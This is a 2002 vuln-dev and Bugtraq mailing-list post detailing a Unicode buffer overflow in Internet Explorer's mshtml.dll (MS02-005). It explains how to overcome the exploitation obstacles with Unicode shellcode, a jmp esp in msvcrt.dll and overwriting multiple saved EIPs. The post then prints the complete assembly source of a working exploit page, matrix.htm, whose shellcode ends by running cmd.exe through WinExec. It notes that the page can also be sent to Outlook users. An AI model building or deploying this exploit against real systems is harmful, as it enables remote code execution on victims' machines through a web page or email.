Details and exploitation of buffer overflow in mshtml.dll (and few sidenotes on Unicode overflows in general)

From: 3APA3A (3APA3A@SECURITY.NNOV.RU)
Date: 02/27/02


Date: Wed, 27 Feb 2002 16:15:32 +0300
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
To: vuln-dev@securityfocus.com, BUGTRAQ@securityfocus.com

Dear,

Advisory was originally posted in [1-3] 2 weeks ago, so I think it's
enough time passed to publish some details, because [4,5] have enough
information to re-discover vulnerability.

ERRor <error(at)pochtamt.ru> discovered IE 5.5 and 6.0 in some cases
crash on

 <embed src="filename.AAAAAAAAAA<lot of 'A's>">

with EIP 0x41004100.

Overflow occurs then IE concatenates file extension to
"Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappingOverride\"
with wcscat().

There is another input validation bug in Internet Explorer: it fails to
detect if file has no extension. In this case it looks for dot before
filename and treats everything after that dot like an extension... So,
it's possible to overflow buffer with long filename without extension.

The rest of this paper is for vuln-dev :)

It's a kind of Unicode buffer overflow so much discussed on Vuln-Dev
some time ago. Usually we do not code and release any exploits for
"standard" holes like format strings or overflows and only point
vulnerability is exploitable. The only reason of this paper is to show
how easy is exploitation of this sort of bug. In future we do not plan
to release any exploits of this kind.

There are few problems for one who wants to create exploit:

1. All data is converted to Unicode, that is 'A' will be converted to
0x0041.
2. Address of shellcode will be different depending on number of open
Internet Explorer windows, Windows and Internet Explorer version and
patches installed.
3. There is different offset of saved EIP in stack in Internet Explorer
before and after IE5.5SP2.
4. A couple of small problems we will not describe, because it may help
to stop virus or scriptkiddie with exploit if one appear in-the-wild.

Now you can try to exploit this bug by yourself... I've got working
exploit after half of hour without using any debugger/disassembler :)

One of the first Unicode overflows found in-the-wild was vulnerability
in IIS ISAPI filter found by eEye[6]. They failed to make really working
exploit, saying exploiting of this kind of bug is hard. This bug was
successfully exploited by hsj and later by authors of CodeRed worm. It
brings us to the fact: EXPLOITATION OF UNICODE OVERFLOWS IS EASY. There
is easy way to bypass conversion of the shellcode to Unicode: it should
be in Unicode already. It was a trick used by CodeRed (wonderful
analysis of CodeRed was made by Andrey Kolishak in [7]). I wrote about
Unicode HTMLs in [8] (in fact [8] was released to prevent possible
impacts of this paper but didn't succeeded, because multiple filters
still don't check Unicode htmls).

Andrey pointed to easy (and well known) way to avoid second problem -
hardcoded shellcode address. Instead of overwriting saved EIP with
address of our shellcode we can use indirect jump - overwrite eip with
address of instruction in memory space of some dll which will jump back
to our code via ebp or esp (ebp may be used if exploiting format
strings). We fond jmp esp (FFE4) in all versions of kernel32.dll and in
one version of msvcrt.dll (6.10.8924.0). This version of dll doesn't
depend on Internet Explorer and presents in most installation of Windows
NT 4.0 and Windows 2000 we checked (but never in Windows 95/98/ME/XP),
so we used it.

Third problem was solved by overwriting all possible EIPs, using few
noops and

  call xxxx
  ...
xxxx:
  pop ebp

combination to get the exact address of our shellcode.

Since exploit is in Unicode we may do not care about '\0' (0x0000,
0xFFFF are prohibited and we have to care about calls and far jumps) so,
we did large shellcode with visual effects. If you like it you can
download full version of dH & SECURITY.NNOV Matrix screensaver from
http://www.security.nnov.ru/advisories/soft/

Resulting HTML (will work with msvcrt.dll 6.10.8924.0 and doesn't depend
on mshtml.dll version, program used and Windows version) can be obtained
from http://www.security.nnov.ru/files/iebo/matrix.htm Same file
(properly encoded to UTF-7, UTF-8, quoted-printable or base64) may be
used to exploit Outlook Express/Outlook. (I've just noticed that under
Windows 2000 terminal window sometimes is open in background and you
need to switch... Well... It's not good but I don't bother to patch it
:) ).

Below is source code for matrix.htm:

-=-=-=-=-=-=-=-=- begin matrix.asm -=-=-=-=-=-=-=-=-
;
; matrix.asm - source code for matrix.htm
;
; build:
; tasm matrix.asm /m2
; tlink matrix.obj, matrix.htm /t /3
;
; Authors:
; ERROR: bug discovery
; 3APA3A: idea and coding
; OFFliner: matrix effects and undocumented Windows API
;
; Thanx to Andrey Kolishak for indirect esp jump idea
;
; you can obtain matrix screensaver from
; http://www.security.nnov.ru/matrix
;
;
; eipjmp: overwrites saved EIP for all versions of
; mshtml.dll
; espjmp: gets control after jmp esp and calls code1
; code1: restores EIP from stack after call to ebp
; does some actions and jumps to code2
; code2: does the rest of actions

datap equ (DataTable+080h)
hKernel32 equ LoadL-datap
cCur equ StringTable-datap
SetCCH equ StringTable+4-datap
GetSH equ StringTable+8-datap
Sleep equ StringTable+12-datap
WriteC equ StringTable+16-datap
AllocC equ StringTable+20-datap
SetCDM equ StringTable+24-datap
SetCTA equ StringTable+28-datap
SetCCI equ StringTable+32-datap
WinE equ StringTable+36-datap
ExitP equ StringTable+40-datap

hStdOut equ StringTable+48-datap
dwOldMode equ cCur
conCur equ StringTable+52-datap
cls equ StringTable+56-datap
DWNumChar equ StringTable+60-datap
RegHK equ user-datap

.386
_faked segment para public 'CODE' use32
       assume cs:_faked
start:
_faked ends

_main segment para public 'DATA' use32
       assume cs:_main

prefix:
        begin db 0ffh,0feh ;Unicode prefix
                db "<",0,"e",0,"m",0,"b",0,"e",0,"d",0,0dh,0
                db "s",0,"r",0,"c",0,"=",0,34,0
                db "h",0,"t",0,"t",0,"p",0,":",0,"/",0,"/",0
                db "w",0,"w",0,"w",0,".",0
                db "s",0,"e",0,"c",0,"u",0,"r",0,"i",0,"t",0,"y",0,".",0
                db "n",0,"n",0,"o",0,"v",0,".",0,"r",0,"u",0
                db "/",0,"f",0,"i",0,"l",0,"e",0,"s",0,"/",0
                db "i",0,"e",0,"b",0,"o",0,"/",0,"X",0
                db "!(c)3APA3A"
                db 22 dup(090h)
code1:
        pop ebp
        mov esp,ebx
        xor eax,eax
dataoffset = DataTable - code2
ebpdiff = 80h + dataoffset
        mov ax,ebpdiff
        add ebp,eax ;ebp points to data
        
        lea eax,[ebp+user-datap]
        push eax
        mov ebx,[ebp+LoadL-datap]
        mov eax,[ebx]
        mov [ebp+LoadL-datap],eax
        call eax ;LoadLibraryA("user32.dll")
        lea ebx,[ebp+reg-datap]
        push ebx
        push eax
        mov ebx,[ebp+GetPA-datap]
        mov eax,[ebx]
        mov [ebp+GetPA-datap],eax
        call eax ;GetProcAddress(.,"RegisterHotKey")
        mov [ebp+RegHK],eax
        lea edi,[ebp+rhk-datap]
        movzx esi,byte ptr[edi]
LoopHotkey:
        inc edi
        xor eax,eax
        mov al,[edi]
        push eax
        inc edi
        mov al,[edi]
        push eax
        inc edi
        mov al,[edi]
        push eax
        xor eax,eax
        push eax
        call [ebp+RegHK]
        dec esi
        or esi,esi
        jnz LoopHotKey
        
        lea eax,[ebp+StringTable-datap] ;string "kernel32.dll"
        push eax
        call [ebp+LoadL-datap] ;LoadLibraryA("kernel32.dll")
        mov [ebp+hKernel32],eax ;hKernel32 =

        lea eax, [ebp+SetCCH]
        mov [ebp+cCur],eax ;*cCur = SetCCH
        lea edi,[ebp+funcnum-datap]
        movzx esi,byte ptr[edi] ;esi=funcnum
        inc edi
LoopResolve:
        push edi
        push dword ptr [ebp+Hkernel32]
        call [ebp+GetPA-datap] ;GetProcAddress(edi)
        mov ebx,[ebp+cCur]
        mov [ebx],eax ;save func address
        xor ecx,ecx
        mov cl,4
        add ebx,ecx
        mov [ebp+cCur],ebx ;cCur+=4
        not ecx
        xor eax,eax
        repnz scasb ;find \0
        dec esi
        or esi,esi
        jnz LoopResolve
        

        call [ebp+AllocC] ;AllocConsole()
        push eax ;nonzero if succeed
        xor eax,eax
        push eax
        call [ebp+SetCCH] ;SetConsoleCtrlHandler(NULL,TRUE)
        xor eax,eax
        not eax
        sub al,0Ah
        push eax
        call [ebp+GetSH] ;GetStdHandle(STD_OUTPUT_HANDLE)
        mov [ebp+hStdOut],eax ;hStdOut=
        lea eax,[ebp+dwOldMode]
        push eax
        xor ebx,ebx
        inc ebx
        push ebx
        push dword ptr [ebp+hStdOut]
        call [ebp+SetCDM] ;SetConsoleDisplayMode(hStdOut, 1, &dwOldMode)
        xor ebx,ebx
        mov bl,0Ah
        push ebx
        push dword ptr [ebp+hStdOut]
        call [ebp+SetCTA] ;SetConsoleTextAttribute(hStdOut,FOREGROUND_INTENSITY|FOREGROUND_GREEN)
        xor ebx,ebx
        mov [ebp+ConCur+4],ebx ;ConCur.bVisible = 100
        mov bl, 100
        mov [ebp+ConCur],ebx ;ConCur.dwSize = 0
        lea eax, [ebp+ConCur]
        push eax
        push dword ptr [ebp+hStdOut]
        call [ebp+SetCCI] ;SetConsoleCursorInfo(hstdOut,&ConCur)
        xor eax,eax
        mov ax,1000
        push eax
        call[ebp+Sleep] ;Sleep(1000);
        xor ebx,ebx
        mov bl, string-datap
        mov eax,ebp
        add eax,ebx
        mov [ebp+cCur],eax ;cCur = string
        mov eax,ebp
        mov bx,datap-empty_string
        sub eax,ebx
        mov [ebp+cls],eax ;set address of empty_string
LOOP1: ;do do
        xor eax,eax
        push eax
        lea ebx,[ebp+DWNumChar]
        push ebx
        inc eax
        push eax
        mov eax,[ebp+cCur]
        push eax
        push dword ptr [ebp+hStdOut]
        call [ebp+WriteC] ;WriteConsole(hStdOut,(void*)cCur,1,&DWNumChar,NULL);
        xor eax,eax
        mov al,100
        mov ecx,[ebp+cCur]
        mov bl,[ecx]
        sub bl,20
        jnz N1
        mov ax,400
N1: mov bl,[ecx]
        sub bl,8
        jnz N2
        mov ax,2100
N2: push eax
        call [ebp+Sleep] ;Sleep((*cCur==' ')?400:(*cCur=='\b')?2100:100)
        mov ecx,[ebp+cCur]
        inc ecx
        mov [ebp+cCur],ecx ;++cCur
        mov bl,[ecx]
        sub bl,9
        jnz LOOP1 ;while(*cCur!='\t');
        call [ebp+cls]
        mov ecx,[ebp+cCur]
        inc ecx
        mov [ebp+cCur],ecx ;++cCur
        mov bl,[ecx]
        sub bl,00Ah
        jnz LOOP1 ;while(*cCur!='\n');
        inc ecx
        xor eax,eax
        push eax
        lea ebx,[ebp+DWNumChar]
        push ebx
        mov al,18
        push eax
        push ecx
        push dword ptr [ebp+hStdOut]
        jmp code2

        
codelength = $ - begin
neednoops = 1d4h - codelength
                db neednoops dup(090h)
eipjmp:

                dd 78024e02h
                dd 78024e02h
                dd 78024e02h
                dd 78024e02h
                dw 9090h
                dd 78024e02h ;EIP for IE < 55SP2

espjmp:

                db 18 dup(090h)
        xor eax,eax ;ESP comes here
        mov ax,0170h
        mov ebx,esp
        sub ebx,eax
        call ebx

code2:
        call [ebp+WriteC]
        xor eax,eax
        mov ax,4000
        push eax
        call [ebp+Sleep]
        call [ebp+cls]
        lea eax,[ebp+cmdexe-datap]
        push eax
        push eax
        call [ebp+WinE]
        xor eax,eax
        push eax
        call [ebp+ExitP]
        
empty_string:
        ; some code can be pasted here
        xor eax,eax
        mov ax,1000
        push eax
        call [ebp+Sleep] ;Sleep(1000)
        xor eax,eax
        push eax
        lea ebx,[ebp+DWNumChar]
        push ebx
        mov al,30
        push eax
        lea eax,[ebp+empty-datap]
        push eax
        push dword ptr [ebp+hStdOut]
        call [ebp+WriteC]
        ret

        

DataTable:

        LoadL dd 780330d0h ;LoadLibraryA import table entry
        GetPA dd 780330cch ;GetProcAddress import table entry

StringTable:

                db "kernel32.dll",0
        funcnum db 10
                db "SetConsoleCtrlHandler",0
                db "GetStdHandle",0
                db "Sleep",0
                db "WriteConsoleA",0
                db "AllocConsole",0
                db "SetConsoleDisplayMode",0
                db "SetConsoleTextAttribute",0
                db "SetConsoleCursorInfo",0
                db "WinExec",0
                db "ExitProcess",0
        user db "user32.dll",0
        reg db "RegisterHotKey",0
        cmdexe db "cmd.exe",0
        rhk db 5
                db 9,1,100,01bh,1,101,13,1,102,05dh,8,103,3,2,104
        empty db 00dh,28 dup(020h),00dh,0
        string db 00dh," Wake Up, Neo...",00dh,009h,0
                db 00dh," The Matrix has you...",00dh,009h,0
                db 00dh," Follow the White Rabbit.",00dh,008h,009h,00ah,0
                db 00dh," Knock, knock...",00dh,0
        
        padding db 32
suffix:
                db 34,0,">",0,00ah
        copy db "(c) 2002 by 3APA3A, ERRor, OFFLiner"

_main ends
   end start
-=-=-=-=-=-=-=-=- end matrix.asm -=-=-=-=-=-=-=-=-

References:

[1] dH & SECURITY.NNOV: buffer overflow in mshtml.dll
    http://www.security.nnov.ru/advisories/mshtml.asp
[2] Microsoft Security Bulletin MS02-005
    http://www.microsoft.com/technet/security/bulletin/MS02-005.asp
[3] CAN-2002-0022
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0022
[4] CERT Advisory CA-2002-04 Buffer Overflow in Microsoft
    Internet Explorer
    http://www.cert.org/advisories/CA-2002-04.html
[5] ISS Alert: Buffer Overflow in Microsoft Internet Explorer
    http://www.security.nnov.ru/search/document.asp?docid=2546
[6] All versions of Microsoft Internet Information Services Remote
    buffer overflow (SYSTEM Level Access)
    http://eeye.com/html/Research/Advisories/AD20010618.html
[7] Andrey Kolishak, History of one vulnerability (in Russian)
    http://www.security.nnov.ru/articles/codered/
[8] Bypassing content filtering software
    http://www.security.nnov.ru/advisories/content.asp

-- 
http://www.security.nnov.ru
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   }
+-------------o66o--+ /
                    |/
You know my name - look up my number (The Beatles)



Relevant Pages